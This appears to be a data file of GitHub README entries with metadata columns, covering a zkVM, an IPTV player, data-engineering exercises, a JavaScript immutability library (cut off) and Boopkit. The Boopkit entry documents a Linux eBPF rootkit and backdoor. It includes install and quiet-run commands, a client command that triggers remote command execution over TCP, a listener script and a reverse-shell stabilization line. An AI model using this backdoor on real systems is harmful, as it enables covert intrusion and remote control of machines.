One contract has slightly different wording for monthly subscription clients, and the other is for clients who pay you a lump sum with no monthly commitment. But you can add hosting fees and domain registration fees or anything else you need in the contract. Make sure you put all your fees and everything in your contract supplemental to what I have provided.
Make sure you replace the highlighted text with yours and your clients info and pricing. Hope this is helpful!
**Contract was drafted for and in the state of Washington, you may need to consult a local state lawyer to make sure it will still work for your state.
**This document is only provided as a personal opinion and should NOT be considered as legal advice; for a legal opinion, you should consult a licensed attorney in your jurisdiction.
| null | null | 0 | 1 | 1 | 14 | 3 | 1 | 0 |
risc0/risc0 | > [!IMPORTANT]
> `main` is the development branch.
> When building applications or running examples, use the [latest release](https://github.com/risc0/risc0/releases) instead.
<p align="center">
<a href="https://risczero.com" target="_blank"><img src="website/static/img/logo.png" height="100"></a>
</p>
[![Crates.io][crates-badge]][crates-url]
[![MIT licensed][licence-badge]][licence-url]
[![Build Status][actions-badge]][actions-url]
[![Discord chat][discord-badge]][discord-url]
[![Twitter][twitter-badge]][twitter-url]
[actions-badge]: https://img.shields.io/github/actions/workflow/status/risc0/risc0/main.yml?branch=main
[actions-url]: https://github.com/risc0/risc0/actions?query=workflow%3ACI+branch%3Amain
[crates-badge]: https://img.shields.io/badge/crates.io-v1.0-orange
[crates-url]: https://crates.io/crates/risc0-zkvm
[discord-badge]: https://img.shields.io/discord/953703904086994974.svg?logo=discord&style=flat-square
[discord-url]: https://discord.gg/risczero
[licence-badge]: https://img.shields.io/github/license/risc0/risc0?color=blue
[licence-url]: https://github.com/risc0/risc0/blob/main/LICENSE
[twitter-badge]: https://img.shields.io/twitter/follow/risczero
[twitter-url]: https://twitter.com/risczero
[cargo-binstall]: https://github.com/cargo-bins/cargo-binstall#cargo-binaryinstall
[cargo-risczero-readme]: https://github.com/risc0/risc0/blob/main/risc0/cargo-risczero/README.md
[crates.io]: https://crates.io
[examples]: https://github.com/risc0/risc0/tree/main/examples
[install-rust]: https://doc.rust-lang.org/cargo/getting-started/installation.html
[risc-v]: https://en.wikipedia.org/wiki/RISC-V
[quickstart]: https://dev.risczero.com/api/zkvm/quickstart
[zk-proof]: https://en.wikipedia.org/wiki/Non-interactive_zero-knowledge_proof
[zksummit10-talk]: https://www.youtube.com/watch?v=wkIBN2CGJdc
[security-model]: https://dev.risczero.com/api/security-model
[proof-system-in-detail]: https://dev.risczero.com/proof-system-in-detail.pdf
[soundness.rs]: risc0/zkp/src/prove/soundness.rs
RISC Zero is a zero-knowledge verifiable general computing platform based on
[zk-STARKs][zk-proof] and the [RISC-V] microarchitecture.
A [zero knowledge proof][zk-proof] allows one party (the prover) to convince
another party (the verifier) that something is true without revealing all the
details. In the case of RISC Zero, the prover can show they correctly executed
some code (known to both parties), while only revealing to the verifier the
output of the code, not any of its inputs or any state during execution.
The code runs in a special virtual machine, called a _zkVM_. The RISC Zero zkVM
emulates a small [RISC-V] computer, allowing it to run arbitrary code in any
language, so long as a compiler toolchain exists that targets RISC-V. Currently,
SDK support exists for Rust, C, and C++.
## Protocol overview and terminology
First, the code to be proven must be compiled from its implementation language
into a _method_. A method is represented by a RISC-V ELF file with a special
entry point that runs the code of the method. Additionally, one can compute for
a given method its _image ID_ which is a special type of cryptographic hash of
the ELF file, and is required for verification.
Next, the host program runs and proves the method inside the zkVM. The logical
RISC-V machine running inside the zkVM is called the _guest_ and the prover
running the zkVM is called the _host_. The guest and the host can communicate
with each other during the execution of the method, but the host cannot modify
the execution of the guest in any way, or the proof being generated will be
invalid. During execution, the guest code can write to a special append-only log
called the _journal_ which represents the official output of the computation.
Presuming the method terminated correctly, a _receipt_ is produced, which
provides the proof of correct execution. This receipt consists of 2 parts: the
journal written during execution and a blob of opaque cryptographic data called
the _seal_.
The verifier can then verify the receipt and examine the log. If any tampering
was done to the journal or the seal, the receipt will fail to verify.
Additionally, it is cryptographically infeasible to generate a valid receipt
unless the output of the journal is the exactly correct output for some valid
execution of the method whose image ID matches the receipt. In summary, the
receipt acts as a zero-knowledge proof of correct execution.
Because the protocol is zero-knowledge, the verifier cannot infer anything about
the details of the execution or any data passed between the host and the guest
(aside from what is implied by the data written to the journal and the correct
execution of the code).
## Security
This code implements a [three-layer recursive proof system][zksummit10-talk],
based on the well-studied zk-STARK protocol and Groth16 protocol. An overview of
the underlying cryptographic assumptions can be found on our [Security
Model][security-model] page. With default parameters, this system achieves
perfect zero-knowledgeness and 98 bits of conjectured security. Our STARK
protocol is described in [Scalable, Transparent Arguments of RISC-V
Integrity][proof-system-in-detail], and a soundness/security calculator is
included in the [soundness.rs][soundness.rs] file.
To run the calculator, use `RUST_LOG=risc0_zkp=debug` when running a proof.
## Getting Started
To start your own project, you can use our `cargo risczero` tool to write the
initial boilerplate and set up a standard directory structure.
First, [install Rust][install-rust] if you don't already have it, then install
the RISC Zero toolchain installer, `rzup`. We'll use `rzup` to install
`cargo-risczero`.
To install `rzup` run the following command and follow the instructions:
```bash
curl -L https://risczero.com/install | bash
```
Next we can install the RISC Zero toolchain by running `rzup`:
```bash
rzup
```
You can verify the installation was successful by running:
```bash
cargo risczero --version
```
After installation, you can create a new project (named `my_project` in this example):
```bash
cargo risczero new my_project
```
More details and options for `cargo risczero` are given in
[its README][cargo-risczero-readme].
For more guidance on how to use RISC Zero, how RISC Zero projects are typically
structured, and other resources useful to developers new to RISC Zero, see our
[Getting Started page][quickstart].
## Building from source
Building from source requires some additional tools and steps.
Please refer to [CONTRIBUTING.md](./CONTRIBUTING.md) for the full instructions.
## Rust Binaries
| crate | [crates.io] |
| -------------- | --------------------------------------------------------------------------------------------------- |
| cargo-risczero | [![x](https://img.shields.io/badge/crates.io-v1.0-orange)](https://crates.io/crates/cargo-risczero) |
| risc0-r0vm | [![x](https://img.shields.io/badge/crates.io-v1.0-orange)](https://crates.io/crates/risc0-r0vm) |
| risc0-tools | [![x](https://img.shields.io/badge/crates.io-v1.0-orange)](https://crates.io/crates/risc0-tools) |
## Rust Libraries
| crate | [crates.io] | [docs.rs](https://docs.rs) |
| --------------------------- | ---------------------------------------------------------------------------------------------------------------- | ------------------------------------------------------------------------------------------------------------- |
| bonsai-sdk | [![x](https://img.shields.io/badge/crates.io-v0.8-orange)](https://crates.io/crates/bonsai-sdk) | [![](https://img.shields.io/docsrs/bonsai-sdk)](https://docs.rs/bonsai-sdk) |
| risc0-binfmt | [![x](https://img.shields.io/badge/crates.io-v1.0-orange)](https://crates.io/crates/risc0-binfmt) | [![](https://img.shields.io/docsrs/risc0-binfmt)](https://docs.rs/risc0-binfmt) |
| risc0-build | [![x](https://img.shields.io/badge/crates.io-v1.0-orange)](https://crates.io/crates/risc0-build) | [![](https://img.shields.io/docsrs/risc0-build)](https://docs.rs/risc0-build) |
| risc0-build-kernel | [![x](https://img.shields.io/badge/crates.io-v1.0-orange)](https://crates.io/crates/risc0-build-kernel) | [![](https://img.shields.io/docsrs/risc0-build-kernel)](https://docs.rs/risc0-build-kernel) |
| risc0-circuit-recursion | [![x](https://img.shields.io/badge/crates.io-v1.0-orange)](https://crates.io/crates/risc0-circuit-recursion) | [![](https://img.shields.io/docsrs/risc0-circuit-recursion)](https://docs.rs/risc0-circuit-recursion) |
| risc0-circuit-recursion-sys | [![x](https://img.shields.io/badge/crates.io-v1.0-orange)](https://crates.io/crates/risc0-circuit-recursion-sys) | [![](https://img.shields.io/docsrs/risc0-circuit-recursion-sys)](https://docs.rs/risc0-circuit-recursion-sys) |
| risc0-circuit-rv32im | [![x](https://img.shields.io/badge/crates.io-v1.0-orange)](https://crates.io/crates/risc0-circuit-rv32im) | [![](https://img.shields.io/docsrs/risc0-circuit-rv32im)](https://docs.rs/risc0-circuit-rv32im) |
| risc0-circuit-rv32im-sys | [![x](https://img.shields.io/badge/crates.io-v1.0-orange)](https://crates.io/crates/risc0-circuit-rv32im-sys) | [![](https://img.shields.io/docsrs/risc0-circuit-rv32im-sys)](https://docs.rs/risc0-circuit-rv32im-sys) |
| risc0-core | [![x](https://img.shields.io/badge/crates.io-v1.0-orange)](https://crates.io/crates/risc0-core) | [![](https://img.shields.io/docsrs/risc0-core)](https://docs.rs/risc0-core) |
| risc0-groth16 | [![x](https://img.shields.io/badge/crates.io-v1.0-orange)](https://crates.io/crates/risc0-groth16) | [![](https://img.shields.io/docsrs/risc0-core)](https://docs.rs/risc0-groth16) |
| risc0-sys | [![x](https://img.shields.io/badge/crates.io-v1.0-orange)](https://crates.io/crates/risc0-sys) | [![](https://img.shields.io/docsrs/risc0-sys)](https://docs.rs/risc0-sys) |
| risc0-zkp | [![x](https://img.shields.io/badge/crates.io-v1.0-orange)](https://crates.io/crates/risc0-zkp) | [![](https://img.shields.io/docsrs/risc0-zkp)](https://docs.rs/risc0-zkp) |
| risc0-zkvm | [![x](https://img.shields.io/badge/crates.io-v1.0-orange)](https://crates.io/crates/risc0-zkvm) | [![](https://img.shields.io/docsrs/risc0-zkvm)](https://docs.rs/risc0-zkvm) |
| risc0-zkvm-platform | [![x](https://img.shields.io/badge/crates.io-v1.0-orange)](https://crates.io/crates/risc0-zkvm-platform) | [![](https://img.shields.io/docsrs/risc0-zkvm-platform)](https://docs.rs/risc0-zkvm-platform) |
## Feature flags
The following feature flags are present in one or more of the crates listed above:
| Feature | Target(s) | Implies | Description | Crates |
| ---------------- | ----------------- | ---------- | ------------------------------------------------------------------------------------------------------------------------------------------------------------ | -------------------------------------------------------------------- |
| client | all except rv32im | std | Enables the client API. | risc0-zkvm |
| cuda | | prove, std | Enables CUDA GPU acceleration for the prover. Requires CUDA toolkit to be installed. | risc0-circuit-recursion, risc0-circuit-rv32im, risc0-zkp, risc0-zkvm |
| disable-dev-mode | all except rv32im | | Disables dev mode so that proving and verifying may not be faked. Used to prevent a misplaced `RISC0_DEV_MODE` from breaking security in production systems. | risc0-zkvm |
| metal | macos | prove, std | Enables Metal GPU acceleration for the prover. | risc0-circuit-recursion, risc0-circuit-rv32im, risc0-zkp, risc0-zkvm |
| prove | all except rv32im | std | Enables the prover, incompatible within the zkvm guest. | risc0-circuit-recursion, risc0-circuit-rv32im, risc0-zkp, risc0-zkvm |
| std | all | | Support for the Rust stdlib. | risc0-circuit-recursion, risc0-circuit-rv32im, risc0-zkp, risc0-zkvm |
## License
This project is licensed under the Apache2 license. See [LICENSE](LICENSE).
| RISC Zero is a zero-knowledge verifiable general computing platform based on zk-STARKs and the RISC-V microarchitecture. | stark,zero-knowledge,virtual-machine,risc-v,cryptography,rust | 42 | 111 | 1,475 | 1,150 | 141 | 114 | 8 |
Kimentanm/aptv | # APTV
🎉 🎉 APTV正式上架AppStore啦,支持节目回看!
支持iOS(含CarPlay)、iPadOS、tvOS、watchOS、macOS
<a href='https://apps.apple.com/cn/app/aptv/id1630403500'><img height='70' alt='Download from AppStore' src='https://img.whalenas.com:283/image/202207141215375.png' /></a>
## TG交流群
> [t.me/AptvPlayer](https://t.me/AptvPlayer)
## 介绍
一个用于播放电视直播流的多功能工具类App
## 已实现功能
- 添加远程m3u文件
- 播放m3u8文件
- 频道回看(需直播源支持)
- 实时获取当前频道预览图
- 获取频道节目单
- iCloud同步
- AppleTV 版本
- Mac 桌面版本
- watchOS 版本
## 接下来的计划
- 聚合配置
- 搜索中心
……
## iOS截图
### 频道列表
<img src="https://cdn.jsdelivr.net/gh/kimentanm/image-store/img/202207041149885.png" width="500"/>
### 收藏
<img src="https://cdn.jsdelivr.net/gh/kimentanm/image-store/img/202207041152076.png" width="500"/>
### 播放页面
<img src="https://cdn.jsdelivr.net/gh/kimentanm/image-store/img/202207041156160.png" width="500"/>
### 配置页面
<img src="https://cdn.jsdelivr.net/gh/kimentanm/image-store/img/202207041157217.png" width="500"/>
### 设置页面
<img src="https://cdn.jsdelivr.net/gh/kimentanm/image-store/img/202207041159967.png" width="500"/>
### 关于APTV
<img src="https://cdn.jsdelivr.net/gh/kimentanm/image-store/img/202207041158660.png" width="500"/>
## tvOS截图
### 频道列表
<img src="https://img.whalenas.com:283/image/202207040045507.jpeg"/>
### 频道分类
<img src="https://img.whalenas.com:283/image/202207040045040.jpeg"/>
### 设置页面
<img src="https://img.whalenas.com:283/image/202207040045038.jpeg"/>
## macOS截图
<img src="https://img.whalenas.com:283/image/202302010935657.png"/>
<img src="https://img.whalenas.com:283/image/202302010936574.png"/>
## watchOS截图
### 频道列表
<img src="https://img.whalenas.com:283/image/202302010938951.png" width="500"/>
### 收藏
<img src="https://img.whalenas.com:283/image/202302010939520.png" width="500"/>
### 配置页面
<img src="https://img.whalenas.com:283/image/202302010939347.png" width="500"/>
### 播放页面
<img src="https://img.whalenas.com:283/image/202302010941968.png" width="500"/>
## 测试源
> 以下直播源仅用于产品测试使用,禁止传播
> 以下直播源均来自于网络,本人只进行收集和整理,不对内容的隐私和版权负责
- IPTV:https://raw.githubusercontent.com/Kimentanm/aptv/master/m3u/iptv.m3u
- 回放测试源:https://raw.githubusercontent.com/Kimentanm/aptv/master/m3u/aptv-playback.m3u
(该测试源随缘更新,若出现个别频道无法播放,请在配置中心中刷新配置)
| 📺 A tool for playing m3u8 file | null | 0 | 2 | 1 | 251 | 20 | 1 | 0 |
krisnova/boopkit | ```
================================================================
██████╗ ██████╗ ██████╗ ██████╗ ██╗ ██╗██╗████████╗
██╔══██╗██╔═══██╗██╔═══██╗██╔══██╗██║ ██╔╝██║╚══██╔══╝
██████╔╝██║ ██║██║ ██║██████╔╝█████╔╝ ██║ ██║
██╔══██╗██║ ██║██║ ██║██╔═══╝ ██╔═██╗ ██║ ██║
██████╔╝╚██████╔╝╚██████╔╝██║ ██║ ██╗██║ ██║
╚═════╝ ╚═════╝ ╚═════╝ ╚═╝ ╚═╝ ╚═╝╚═╝ ╚═╝
Author: Kris Nóva <kris@nivenly.com> Version 1.4.0
IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
EXEMPLARY, OR CONSEQUENTIAL DAMAGES.
DO NOT ATTEMPT TO USE THE TOOLS TO VIOLATE THE LAW.
THE AUTHOR IS NOT RESPONSIBLE FOR ANY ILLEGAL ACTION.
MISUSE OF THE SOFTWARE, INFORMATION, OR SOURCE CODE
MAY RESULT IN CRIMINAL CHARGES.
Use at your own risk.
================================================================
Boopkit.
Linux rootkit and backdoor. Built using eBPF.
Usage:
boopkit [options]
Options:
-h, help Display help and usage for boopkit.
-i, interface Interface name. lo, eth0, wlan0, etc
-s, sudo-bypass Bypass sudo check. Breaks PID obfuscation.
-r, reverse-conn Attempt a reverse RCE lookup if no payload found.
-q, quiet Disable output.
-x, reject Source addresses to reject triggers from.
```
Linux backdoor, rootkit, and eBPF bypass tools.
Remote command execution over raw TCP.
- Tested on Linux kernel 5.16
- Tested on Linux kernel 5.17
- Remote code execution over TCP (SSH, Nginx, Kubernetes, etc)
- Network gateway bypass (bad checksums, TCP reset)
- Self obfuscation at runtime (eBPF process hiding)
##### Disclaimer
> This is **NOT** an exploit! This requires prior privileged access on a server in order to work!
> I am a professional security researcher. These are white hat tools used for research purposes only.
> Use this responsibly. Never use this software illegally.
![FSpgEXTacAYme8t](https://user-images.githubusercontent.com/13757818/168698377-9c1125d6-698d-4009-a599-56b275b54764.jpeg)
## Server Side
Download and build boopkit.
```bash
wget https://github.com/kris-nova/boopkit/archive/refs/tags/v1.3.0.tar.gz
tar -xzf v1.3.0.tar.gz
cd boopkit-1.3.0/
make
sudo make install
```
Run boopkit in the foreground.
```bash
# Reject all boops on localhost and 10.0.0.1
boopkit -x 127.0.0.1 -x 10.0.0.1
```
Run boopkit in the background in quiet mode.
```bash
# Danger! This can be VERY hard to stop! Run this at your own risk!
boopkit -q &
```
Boopkit is now running and can be exploited using the client `boopkit-boop` command line tool.
## Client Side
Download and build boopkit.
```bash
wget https://github.com/kris-nova/boopkit/archive/refs/tags/v1.2.0.tar.gz
tar -xzf v1.2.0.tar.gz
cd boopkit-1.2.0/
make
sudo make install
```
Run boopkit-boop against the server.
```bash
# ===================
RCE="ls -la"
# ===================
LHOST="127.0.0.1"
LPORT="3535"
RHOST="127.0.0.1"
RPORT="22"
boopkit-boop \
-lhost $LHOST \
-lport $LPORT \
-rhost $RHOST \
-rport $RPORT \
-c "$RCE"
```
# Boop Vectors
Boopkit will respond to various events on the network. Both of which can be triggered with the `boopkit-boop` tool.
TCP Header Format. Taken from [RFC 793](https://datatracker.ietf.org/doc/html/rfc793#section-3.1). September 1981
```
0 1 2 3
0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Source Port | Destination Port |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Sequence Number |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Acknowledgment Number |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Data | |U|A|P|R|S|F| |
| Offset| Reserved |R|C|S|S|Y|I| Window |
| | |G|K|H|T|N|N| |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Checksum | Urgent Pointer |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Options | Padding |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
{ data }
{ .... }
{ data }
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
```
### 1. Bad Checksum
First the `boopkit-boop` tool will send a malformed TCP SYN packet with an empty checksum to the server over a `SOCK_RAW` socket. This will trigger `boopkit` remotely regardless of what TCP services are running. This works against any Linux server running boopkit, regardless of the state of TCP services.
Use `-p` with `boopkit-boop` to only use this first vector.
⚠️ Some modern network hardware will DROP all malformed checksum packets such as the one required to exploit boopkit using this vector!
### 2. Sending ACK-RST packet
Next the `boopkit-boop` tool will complete a valid TCP handshake with a `SOCK_STREAM` socket against a remote TCP service such as SSH, Kubernetes, Nginx, etc. After the initial TCP handshake is complete, `boopkit-boop` will repeat the process a 2nd time.
The 2nd handshake will flip the TCP reset flag in the packet, trigger a TCP reset on the server.
Either of these tactics are enough to independently trigger boopkit.
Various network hardware and runtime conditions will make either tactic more viable.
Boopkit will try both, and respond to both by default.
# Boopscript
The `boopscript` file is a [Metasploit](https://github.com/rapid7/metasploit-framework) compatible script that can be used to remotely trigger the boopkit backdoor after `boopkit-boop` is installed on a remote Linux machine.
```bash
# boopscript
RHOST="127.0.0.1"
RPORT="22"
LHOST="127.0.0.1"
LPORT="3535"
NCAT="/usr/bin/ncat"
NCATLISTENPORT="3545"
```
### Compile Time Dependencies
- 'clang'
- 'bpftool' Required for `libbpf`
- 'xdp-tools' Required for `libxdp`
- 'llvm'
- 'pcap'
- 'lib32-glibc'
### Reverse Shell Stabilization
```bash
python -c "import pty; pty.spawn('/bin/bash')"
```
### References
- [Tracepoints with BPF](https://lwn.net/Articles/683504/)
- [Raw TCP Sockets](https://github.com/MaxXor/raw-sockets-example)
- [Bad BPF](https://github.com/pathtofile/bad-bpf)
Credit to the original authors for their helpful code samples! I forked a lot of code for this project!
| Linux eBPF backdoor over TCP. Spawn reverse shells, RCE, on prior privileged access. Less Honkin, More Tonkin. | tcp,linux-kernel-hacking,ebpf,security | 8 | 1 | 1 | 248 | 11 | 1 | 0 |
danielbeach/data-engineering-practice | ## Data Engineering Practice Problems
One of the main obstacles of Data Engineering is the large
and varied technical skills that can be required on a
day-to-day basis.
*** Note - If you email a link to your GitHub repo with all the completed
exercises, I will send you back a free copy of my ebook Introduction to Data Engineering. ***
This aim of this repository is to help you develop and
learn those skills. Generally, here are the high level
topics that these practice problems will cover.
- Python data processing.
- csv, flat-file, parquet, json, etc.
- SQL database table design.
- Python + Postgres, data ingestion and retrieval.
- PySpark
- Data cleansing / dirty data.
### How to work on the problems.
You will need two things to work effectively on most all
of these problems.
- `Docker`
- `docker-compose`
All the tools and technologies you need will be packaged
into the `dockerfile` for each exercise.
For each exercise you will need to `cd` into that folder and
run the `docker build` command, that command will be listed in
the `README` for each exercise, follow those instructions.
### Beginner Exercises
#### Exercise 1 - Downloading files.
The [first exercise](https://github.com/danielbeach/data-engineering-practice/tree/main/Exercises/Exercise-1) tests your ability to download a number of files
from an `HTTP` source and unzip them, storing them locally with `Python`.
`cd Exercises/Exercise-1` and see `README` in that location for instructions.
#### Exercise 2 - Web Scraping + Downloading + Pandas
The [second exercise](https://github.com/danielbeach/data-engineering-practice/tree/main/Exercises/Exercise-2)
tests your ability perform web scraping, build uris, download files, and use Pandas to
do some simple cumulative actions.
`cd Exercises/Exercise-2` and see `README` in that location for instructions.
#### Exercise 3 - Boto3 AWS + s3 + Python.
The [third exercise](https://github.com/danielbeach/data-engineering-practice/tree/main/Exercises/Exercise-3) tests a few skills.
This time we will be using a popular `aws` package called `boto3` to try to perform a multi-step
actions to download some open source `s3` data files.
`cd Exercises/Exercise-3` and see `README` in that location for instructions.
#### Exercise 4 - Convert JSON to CSV + Ragged Directories.
The [fourth exercise](https://github.com/danielbeach/data-engineering-practice/tree/main/Exercises/Exercise-4)
focuses more file types `json` and `csv`, and working with them in `Python`.
You will have to traverse a ragged directory structure, finding any `json` files
and converting them to `csv`.
#### Exercise 5 - Data Modeling for Postgres + Python.
The [fifth exercise](https://github.com/danielbeach/data-engineering-practice/tree/main/Exercises/Exercise-5)
is going to be a little different than the rest. In this problem you will be given a number of
`csv` files. You must create a data model / schema to hold these data sets, including indexes,
then create all the tables inside `Postgres` by connecting to the database with `Python`.
### Intermediate Exercises
#### Exercise 6 - Ingestion and Aggregation with PySpark.
The [sixth exercise](https://github.com/danielbeach/data-engineering-practice/tree/main/Exercises/Exercise-6)
Is going to step it up a little and move onto more popular tools. In this exercise we are going
to load some files using `PySpark` and then be asked to do some basic aggregation.
Best of luck!
#### Exercise 7 - Using Various PySpark Functions
The [seventh exercise](https://github.com/danielbeach/data-engineering-practice/tree/main/Exercises/Exercise-7)
Taking a page out of the previous exercise, this one is focus on using a few of the
more common build in PySpark functions `pyspark.sql.functions` and applying their
usage to real-life problems.
Many times to solve simple problems we have to find and use multiple functions available
from libraries. This will test your ability to do that.
#### Exercise 8 - Using DuckDB for Analytics and Transforms.
The [eighth exercise](https://github.com/danielbeach/data-engineering-practice/tree/main/Exercises/Exercise-8)
Using new tools is imperative to growing as a Data Engineer. DuckDB is one of those new tools. In this
exercise you will have to complete a number of analytical and transformation tasks using DuckDB. This
will require an understanding of the functions and documenation of DuckDB.
#### Exercise 9 - Using Polars lazy computation.
The [ninth exercise](https://github.com/danielbeach/data-engineering-practice/tree/main/Exercises/Exercise-9)
Polars is a new Rust based tool with a wonderful Python package that has taken Data Engineering by
storm. It's better than Pandas because it has both SQL Context and supports Lazy evalutation
for larger than memory data sets! Show your Lazy skills! | Data Engineering Practice Problems | null | 0 | 2 | 21 | 21 | 6 | 2 | 0 |
unadlib/mutative | # Mutative
<a href="https://mutative.js.org/" target="_blank"><img src="https://raw.githubusercontent.com/unadlib/mutative/main/website/static/img/ mutative.png" height="120" alt="Mutative Logo" /></a>
![Node CI](https://github.com/unadlib/mutative/workflows/Node%20CI/badge.svg)
[![Coverage Status](https://coveralls.io/repos/github/unadlib/mutative/badge.svg?branch=main)](https://coveralls.io/github/unadlib/mutative?branch=main)
[![npm](https://img.shields.io/npm/v/mutative.svg)](https://www.npmjs.com/package/mutative)
![NPM Downloads](https://img.shields.io/npm/dm/mutative)
![license](https://flat-badgen.vercel.app/npm/license/mutative)
**Mutative** - A JavaScript library for efficient immutable updates, 2-6x faster than naive handcrafted reducer, and more than 10x faster than Immer.
**Why is Mutative faster than the spread operation(naive handcrafted reducer)?**
The spread operation has performance pitfalls, which can be detailed in the following article:
- <a href="https://www.richsnapp.com/article/2019/06-09-reduce-spread-anti-pattern" target="_blank">The reduce ({...spread}) anti-pattern</a>
- <a href="https://jonlinnell.co.uk/articles/spread-operator-performance?fbclid=IwAR0mElQwz2aOxl8rcsqoYwkcQDlcXcwuyIsTmTAbmyzrarysS8-BC1lSY9k" target="_blank">How slow is the Spread operator in JavaScript?</a>
And Mutative optimization focus on shallow copy optimization, more complete lazy drafts, finalization process optimization, and more.
## Motivation
Writing immutable updates by hand is usually difficult, prone to errors, and cumbersome. Immer helps us write simpler immutable updates with "mutative" logic.
But its performance issue causes a runtime performance overhead. Immer must have auto-freeze enabled by default(Performance will be worse if auto-freeze is disabled), such immutable state with Immer is not common. In scenarios such as cross-processing, remote data transfer, etc., we have to constantly freeze these immutable data.
There are more parts that could be improved, such as better type inference, non-intrusive markup, support for more types of immutability, Safer immutability, [more edge cases](test/immer-non-support.test.ts), and so on.
This is why Mutative was created.
## Mutative vs Naive Handcrafted Reducer Performance
<details>
<summary><b>Mutative vs Reducer benchmark by object: </b></summary>
- Naive handcrafted reducer
```ts
// baseState type: Record<string, { value: number }>
const state = {
...baseState,
key0: {
...baseState.key0,
value: i,
},
};
```
- Mutative
```ts
const state = create(baseState, (draft) => {
draft.key0.value = i;
});
```
![Mutative vs Reducer benchmark by object](benchmark-object.jpg)
> Measure(seconds) to update the 1K-100K items object, lower is better([view source](https://github.com/unadlib/mutative/blob/main/test/performance/benchmark-object.ts)).
</details>
Mutative is up to 2x faster than naive handcrafted reducer for updating immutable objects.
<details>
<summary><b>Mutative vs Reducer benchmark by array: </b></summary>
- Naive handcrafted reducer
```ts
// baseState type: { value: number }[]
// slower 6x than Mutative
const state = [
{ ...baseState[0], value: i },
...baseState.slice(1, baseState.length),
];
// slower 2.5x than Mutative
// const state = baseState.map((item, index) =>
// index === 0 ? { ...item, value: i } : item
// );
// same performance as Mutative
// const state = [...baseState];
// state[0] = { ...baseState[0], value: i };
```
> The actual difference depends on which spread operation syntax you use.
- Mutative
```ts
const state = create(baseState, (draft) => {
draft[0].value = i;
});
```
![Mutative vs Reducer benchmark by array](benchmark-array.jpg)
> Measure(seconds) to update the 1K-100K items array, lower is better([view source](https://github.com/unadlib/mutative/blob/main/test/performance/benchmark-array.ts)).
</details>
Mutative is up to 6x faster than naive handcrafted reducer for updating immutable arrays.
## Mutative vs Immer Performance
> Mutative passed all of Immer's test cases.
Measure(ops/sec) to update 50K arrays and 1K objects, bigger is better([view source](https://github.com/unadlib/mutative/blob/main/test/performance/benchmark.ts)). [Mutative v1.0.5 vs Immer v10.1.1]
![Benchmark](benchmark.jpg)
```
Naive handcrafted reducer - No Freeze x 4,442 ops/sec ±0.38% (95 runs sampled)
Mutative - No Freeze x 6,199 ops/sec ±0.79% (89 runs sampled)
Immer - No Freeze x 5.30 ops/sec ±0.38% (18 runs sampled)
Mutative - Freeze x 974 ops/sec ±1.77% (92 runs sampled)
Immer - Freeze x 376 ops/sec ±0.67% (92 runs sampled)
Mutative - Patches and No Freeze x 969 ops/sec ±0.99% (97 runs sampled)
Immer - Patches and No Freeze x 5.27 ops/sec ±0.36% (18 runs sampled)
Mutative - Patches and Freeze x 514 ops/sec ±0.97% (95 runs sampled)
Immer - Patches and Freeze x 275 ops/sec ±0.74% (89 runs sampled)
The fastest method is Mutative - No Freeze
```
Run `yarn benchmark` to measure performance.
> OS: macOS 14.2.1, CPU: Apple M1 Max, Node.js: v20.11.0
Immer relies on auto-freeze to be enabled, if auto-freeze is disabled, Immer will have a huge performance drop and Mutative will have a huge performance lead, especially with large data structures it will have a performance lead of more than 50x.
So if you are using Immer, you will have to enable auto-freeze for performance. Mutative is disabled auto-freeze by default. With the default configuration of both, we can see the 16x performance gap between Mutative (`6,199 ops/sec`) and Immer (`376 ops/sec`).
Overall, Mutative has a huge performance lead over Immer in [more performance testing scenarios](https://github.com/unadlib/mutative/tree/main/test/performance). Run `yarn performance` to get all the performance results locally.
<details>
<summary><b>More Performance Testing Scenarios, Mutative is up to `2.5X-73.8X` faster than Immer: </b></summary>
![Mutative vs Immer - All benchmark results by average multiplier](test/benchmark/results/all.jpg)
> [view source](https://github.com/unadlib/mutative/blob/main/test/benchmark).
</details>
## Features and Benefits
- **Mutation makes immutable updates** - Immutable data structures supporting objects, arrays, Sets and Maps.
- **High performance** - 10x faster than immer by default, even faster than naive handcrafted reducer.
- **Optional freezing state** - No freezing of immutable data by default.
- **Support for JSON Patch** - Full compliance with JSON Patch specification.
- **Custom shallow copy** - Support for more types of immutable data.
- **Support mark for immutable and mutable data** - Allows for non-invasive marking.
- **Safer mutable data access in strict mode** - It brings more secure immutable updates.
- **Support for reducer** - Support reducer function and any other immutable state library.
## Difference between Mutative and Immer
| | Mutative | Immer |
| :------------------------------------ | -------: | :---: |
| Custom shallow copy | ✅ | ❌ |
| Strict mode | ✅ | ❌ |
| No data freeze by default | ✅ | ❌ |
| Non-invasive marking | ✅ | ❌ |
| Complete freeze data | ✅ | ❌ |
| Non-global config | ✅ | ❌ |
| async draft function | ✅ | ❌ |
| Fully compatible with JSON Patch spec | ✅ | ❌ |
Mutative has fewer bugs such as accidental draft escapes than Immer, [view details](https://github.com/unadlib/mutative/blob/main/test/immer-non-support.test.ts).
## Installation
Yarn
```sh
yarn add mutative
```
NPM
```sh
npm install mutative
```
CDN
- Unpkg: `<script src="https://unpkg.com/mutative"></script>`
- JSDelivr: `<script src="https://cdn.jsdelivr.net/npm/mutative"></script>`
## Usage
```ts
import { create } from 'mutative';
const baseState = {
foo: 'bar',
